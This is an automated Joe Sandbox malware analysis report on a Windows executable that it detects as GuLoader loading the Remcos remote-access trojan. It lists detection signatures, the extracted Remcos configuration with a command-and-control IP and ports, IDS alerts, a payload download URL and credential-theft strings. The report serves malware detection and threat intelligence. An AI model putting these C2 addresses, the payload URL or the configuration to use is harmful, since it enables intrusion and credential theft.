Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
APPENDIX FORM_N#U00b045013-20241120.com.exe

Overview

General Information

Sample name:APPENDIX FORM_N#U00b045013-20241120.com.exe
renamed because original name is a hash value
Original sample name:APPENDIX FORM_N45013-20241120.com.exe
Analysis ID:1560110
MD5:cf4530628bdb401e066ea81e86403d77
SHA1:b929d4f89e537b8f932bebc75df0959ef9b406ee
SHA256:e721952c765bb39555f2aa9f2141649fe2c1f2700224513c2860c8a7e25d2260
Tags:exeuser-TeamDreier
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["45.133.158.36:11371:1", "45.133.158.36:10051:1", "45.133.158.36:10050:1", "45.133.158.36:24554:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CDCZ2K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Click to see the 2 entries

            Sigma Signatures

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: BC 8C A9 73 7D AF EC 8F 40 5A DB 37 B9 F0 FF 2F 1C 0F C8 E7 D0 5A CC B7 F7 60 E4 30 E1 7F 4B 15 A7 75 A5 0D 0F 6F 58 23 41 BE CA 17 FB 24 10 47 99 01 0A 82 08 60 5F 8E 43 27 C9 9F 35 20 5C 73 C0 7F D2 34 8F E9 8E 47 8A D5 4F 61 1A CE CE CC A6 5D DD 3D 91 CF 90 8F F1 D5 4E 76 EA 8D E9 B9 8E 3C 87 6B AB DC 9D 38 4D 14 D1 1F 9B C8 67 C1 0A ED DC B8 94 9A 20 62 8F E9 80 0C EF B1 AE 18 61 31 FC 86 71 68 EA FF E2 4A 1E 19 02 A2 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe, ProcessId: 6836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-CDCZ2K\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:20:18.397173+010020365941Malware Command and Control Activity Detected192.168.2.74983345.133.158.3611371TCP
            2024-11-21T12:20:20.709769+010020365941Malware Command and Control Activity Detected192.168.2.74984045.133.158.3611371TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:20:20.949672+010028033043Unknown Traffic192.168.2.749842178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:20:15.335061+010028032702Potentially Bad Traffic192.168.2.74982645.133.158.3680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["45.133.158.36:11371:1", "45.133.158.36:10051:1", "45.133.158.36:10050:1", "45.133.158.36:24554:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CDCZ2K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Multi AV Scanner detection for submitted file
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeReversingLabs: Detection: 52%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,8_2_00404423
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_00402647 FindFirstFileA,4_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_00405FE4 FindFirstFileA,FindClose,4_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_333E10F1
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_333E6580
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49840 -> 45.133.158.36:11371
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49833 -> 45.133.158.36:11371
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorIPs: 45.133.158.36
            Source: Malware configuration extractorIPs: 45.133.158.36
            Source: Malware configuration extractorIPs: 45.133.158.36
            Source: Malware configuration extractorIPs: 45.133.158.36
            Source: global trafficTCP traffic: 192.168.2.7:49833 -> 45.133.158.36:11371
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49826 -> 45.133.158.36:80
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49842 -> 178.237.33.50:80
            Source: global trafficHTTP traffic detected: GET /cvTLIRXJzBJoApmtjAY235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 45.133.158.36Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: unknownTCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: global trafficHTTP traffic detected: GET /cvTLIRXJzBJoApmtjAY235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 45.133.158.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000003.1985053478.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000003.1985053478.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.yahoo.com (Yahoo)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985865973.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985865973.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.yahoo.com (Yahoo)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2602167733.0000000004490000.00000004.00001000.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bin
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0G
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpA
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpMG
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpTGu
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0H
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0S
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0~
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985266200.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
